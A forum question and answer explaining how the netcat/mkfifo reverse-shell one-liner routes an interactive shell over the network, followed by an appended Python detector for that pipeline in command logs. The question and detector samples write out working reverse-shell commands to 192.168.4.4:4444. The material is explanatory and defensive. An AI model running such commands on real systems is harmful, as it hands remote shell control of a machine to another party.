How does this command work? (reverse shell)
There was a simple way to connect two systems and get a shell using the nc command, as below.
Machine A, to listen:
nc -nlvp 4444
Machine B, to connect:
nc 192.168.4.4 4444 -e /bin/bash
However, the -e option is no more. The man page recommends the following to execute commands:
Machine A, to listen:
nc -nlvp 4444
Machine B, to connect:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f
I do know the concepts behind mkfifo (unnamed pipes) and how redirection and piping work. But it still confuses me.
command-line networking bash netcat
edited Mar 26 at 1:22 by Sergiy Kolodyazhnyy
asked Mar 21 at 5:47 by Goron
1 Answer
Let's think in standard streams, stdin and stderr, for a minute.
nc 192.168.4.4 4444 >/tmp/f
The stdout stream of nc gets duplicated to the /tmp/f fifo, which means whatever it receives from the other machine over the network goes there. So where does stdin come from? From /bin/sh -i 2>&1. As far as nc is concerned, it just has to send that data back to the other machine.
Well, what does /bin/sh -i do? It invokes an interactive shell - the one where you type commands and print output to stdout. The user@host prompt is typically (if not always) printed to stderr, but we need to send that to the remote machine, hence the 2>&1 redirection is applied to send the prompt via the pipe. Well, we can't use stdout to print the output - the shell has to send that to nc 192.168.4.4 4444 to be sent over the network. We can't read stdin either - cat /tmp/f will be using that to print whatever command is issued from machine A in your example. Piping commands to the interactive shell isn't anything particularly special - when stdin is rewired, an application isn't aware of it unless it is actively checking.
$ echo 'df' | sh -i
$ Filesystem 1K-blocks Used Available Use% Mounted on
udev 4000944 0 4000944 0% /dev
tmpfs 805348 1400 803948 1% /run
/dev/sda1 28717732 25907684 1328188 96% /
tmpfs 4026732 97496 3929236 3% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 4026732 0 4026732 0% /sys/fs/cgroup
/dev/sdb1 115247656 99204832 10165476 91% /mnt/ubuntu
tmpfs 805344 32 805312 1% /run/user/1000
$
sh: 1: Cannot set tty process group (No such process)
So to put it briefly, the shell reads commands from the fifo and sends commands over the network via the pipe to nc. The commands sent from remote to the local shell are written by nc to the fifo. And so the loop goes on and on.
NOTE: nc doesn't provide any security of information - commands and their output are transmitted over the network in plain text and an attacker could potentially modify the data between machines A and B. If you do want to have a secure way to issue commands to the remote machine via its shell - use ssh. The ssh protocol was designed specifically for that purpose.
edited Mar 23 at 1:44
answered Mar 21 at 6:43 by Sergiy Kolodyazhnyy
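A defender-side check built from the three pipeline stages the answer walks through, added here as an example and not part of the original question or answer: it flags command lines (as a process-creation log might record them) where cat feeds a fifo into an interactive shell, the shell's merged stdout/stderr goes to nc, and nc's stdout is written back into the same fifo, which is exactly what closes the loop. Python is used because it is convenient for parsing logged command lines; the sample command lines and the regular expressions are constructed for this example.

```python
import re

# Constructed sample command lines, in the form a process-creation log
# (auditd EXECVE records, EDR telemetry) might surface them. Only the second
# one wires a shell into the fifo loop the answer describes.
SAMPLE_COMMANDS = [
    "cat /var/log/syslog | grep -i error",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.4.4 4444 >/tmp/f",
    "mkfifo /tmp/pipe; cat /tmp/pipe | sort > /tmp/out",
    "nc -nlvp 4444",
]

# A fifo path ends at whitespace or a command separator (; | &).
FIFO_RE = re.compile(r"mkfifo\s+([^\s;|&]+)")
# Interactive shell with stderr merged into stdout, as its own pipeline stage.
SH_RE = re.compile(r"(?:^|\|)\s*(?:/bin/)?(?:ba|da)?sh\s+-i\s+2>&1\s*(?:\||$)")
# Final stage: nc/ncat HOST PORT with stdout redirected into a file.
NC_RE = re.compile(
    r"(?:^|\|)\s*(?:nc|ncat|netcat)\s+(?:-\S+\s+)*(\S+)\s+(\d{1,5})\s*>\s*([^\s;|&]+)"
)


def fifo_loop(cmdline):
    """Return (fifo, host, port) when cmdline closes the loop the answer
    describes: the shell's stdin is fed from a fifo by cat, its merged
    stdout/stderr goes to nc, and nc's stdout is written back into the same
    fifo. Return None for anything that leaves the loop open."""
    fifo_match = FIFO_RE.search(cmdline)
    if not fifo_match:
        return None
    fifo = fifo_match.group(1)
    # Stage 1: the fifo must be the read end of the pipeline (cat FIFO | ...).
    if not re.search(r"cat\s+" + re.escape(fifo) + r"\s*\|", cmdline):
        return None
    # Stage 2: an interactive shell whose prompt (stderr) joins stdout.
    if not SH_RE.search(cmdline):
        return None
    # Stage 3: nc forwards the shell's output and writes what it receives
    # back into the same fifo; a different target would not close the loop.
    nc_match = NC_RE.search(cmdline)
    if not nc_match or nc_match.group(3) != fifo:
        return None
    return fifo, nc_match.group(1), int(nc_match.group(2))


def scan(cmdlines):
    """Index every command line that closes the fifo loop, with its endpoint."""
    hits = []
    for idx, line in enumerate(cmdlines):
        found = fifo_loop(line)
        if found:
            hits.append((idx,) + found)
    return hits
```

The check is deliberately strict about the fifo being both the read source of stage one and the write target of stage three; a pipeline that uses a fifo but never writes nc's output back into it is ordinary plumbing and is not flagged.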